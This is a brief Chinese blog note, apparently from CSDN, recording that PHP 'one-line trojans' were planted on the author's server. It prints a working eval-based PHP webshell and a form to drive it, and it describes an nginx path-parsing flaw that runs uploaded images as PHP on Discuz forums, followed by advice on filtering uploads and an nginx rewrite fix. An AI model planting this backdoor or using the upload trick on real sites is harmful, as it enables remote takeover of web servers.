标签:php一句话木马
服务器上发现被植了很多木马,而且还让人肆意使用...NND
<?php @eval($_POST['c']);?>
<html> <body> <form action="a.php" method="post"> <input type="text" name="c" value="phpinfo();"> <input type="submit" value="submit"> </form> </body> </html>
仅此做个记录,php一定要做好过滤系统。一定要处理上传的东西。
由于nginx早期的版本,至少我在用 0.9.X 的版本依旧存在漏洞,导致处理过的图片可以执行php代码
简单的说就是写好的php代码将扩展名改为图片,如 xx.jpg 文件后通过 discuz 等开源论坛的上传功能上传后可以通过 http://xxx.com/bbs/data/xxxxxxxx/xx.jpg/1.php 方式执行 xx.php里面的代码
对于discuz 论坛使用nginx的服务器可以使用rewrite方式防止代码执行
标签:php一句话木马
原文地址:http://blog.csdn.net/phpfenghuo/article/details/39162739